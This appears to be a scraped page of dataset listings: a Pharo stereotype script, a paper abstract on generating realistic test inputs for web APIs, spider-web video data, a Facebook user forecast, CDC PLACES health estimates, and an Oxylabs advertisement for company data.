Script used in the Playground of Pharo to return counts of how many methods get assigned the specific method stereotypes. Returns numbers for the method stereotypes in the order Accessors, Getters, Mutators, Setters, Collaborators,
Facebook
TwitterAttribution 4.0 (CC BY 4.0)https://creativecommons.org/licenses/by/4.0/
License information was derived automatically
Testing web APIs automatically requires generating input data values such as addressess, coordinates or country codes. Generating meaningful values for these types of parameters randomly is rarely feasible, which means a major obstacle for current test case generation approaches. In this paper, we present ARTE, the first semantic-based approach for the Automated generation of Realistic TEst inputs for web APIs. Specifically, ARTE leverages the specification of the API under test to extract semantically related values for every parameter by applying knowledge extraction techniques. Our approach has been integrated into RESTest, a state-of-the-art tool for API testing, achieving an unprecedented level of automation which allows to generate up to 100\% more valid API calls than existing fuzzing techniques (30\% on average). Evaluation results on a set of 26 real-world APIs show that ARTE can generate realistic inputs for 7 out of every 10 parameters, outperforming the results obtained by related approaches.
Facebook
TwitterAttribution-NonCommercial 4.0 (CC BY-NC 4.0)https://creativecommons.org/licenses/by-nc/4.0/
License information was derived automatically
This archive contains the raw video files for all webs used in publication, as well as the LEAP and DeepLabCut models, and tSNE embeddings that were the result of analyzing these videos.
Facebook
TwitterThe global number of Facebook users was forecast to continuously increase between 2023 and 2027 by in total 391 million users (+14.36 percent). After the fourth consecutive increasing year, the Facebook user base is estimated to reach 3.1 billion users and therefore a new peak in 2027. Notably, the number of Facebook users was continuously increasing over the past years. User figures, shown here regarding the platform Facebook, have been estimated by taking into account company filings or press material, secondary research, app downloads and traffic data. They refer to the average monthly active users over the period and count multiple accounts by persons only once.The shown data are an excerpt of Statista's Key Market Indicators (KMI). The KMI are a collection of primary and secondary indicators on the macro-economic, demographic and technological environment in up to 150 countries and regions worldwide. All indicators are sourced from international and national statistical offices, trade associations and the trade press and they are processed to generate comparable data sets (see supplementary notes under details for more information).
Facebook
TwitterThis dataset contains model-based place (incorporated and census designated places) level estimates for the PLACES 2022 release in GIS-friendly format. PLACES covers the entire United States—50 states and the District of Columbia (DC)—at county, place, census tract, and ZIP Code Tabulation Area levels. It provides information uniformly on this large scale for local areas at 4 geographic levels. Estimates were provided by the Centers for Disease Control and Prevention (CDC), Division of Population Health, Epidemiology and Surveillance Branch. PLACES was funded by the Robert Wood Johnson Foundation in conjunction with the CDC Foundation. Data sources used to generate these model-based estimates include Behavioral Risk Factor Surveillance System (BRFSS) 2020 or 2019 data, Census Bureau 2010 population estimates, and American Community Survey (ACS) 2015–2019 estimates. The 2022 release uses 2020 BRFSS data for 25 measures and 2019 BRFSS data for 4 measures (high blood pressure, taking high blood pressure medication, high cholesterol, and cholesterol screening) that the survey collects data on every other year. These data can be joined with the 2019 Census TIGER/Line place boundary file in a GIS system to produce maps for 29 measures at the place level. An ArcGIS Online feature service is also available for users to make maps online or to add data to desktop GIS software. https://cdcarcgis.maps.arcgis.com/home/item.html?id=3b7221d4e47740cab9235b839fa55cd7
Facebook
TwitterCompany Datasets for valuable business insights!
Discover new business prospects, identify investment opportunities, track competitor performance, and streamline your sales efforts with comprehensive Company Datasets.
These datasets are sourced from top industry providers, ensuring you have access to high-quality information:
We provide fresh and ready-to-use company data, eliminating the need for complex scraping and parsing. Our data includes crucial details such as:
You can choose your preferred data delivery method, including various storage options, delivery frequency, and input/output formats.
Receive datasets in CSV, JSON, and other formats, with storage options like AWS S3 and Google Cloud Storage. Opt for one-time, monthly, quarterly, or bi-annual data delivery.
With Oxylabs Datasets, you can count on:
Pricing Options:
Standard Datasets: choose from various ready-to-use datasets with standardized data schemas, priced from $1,000/month.
Custom Datasets: Tailor datasets from any public web domain to your unique business needs. Contact our sales team for custom pricing.
Experience a seamless journey with Oxylabs:
Unlock the power of data with Oxylabs' Company Datasets and supercharge your business insights today!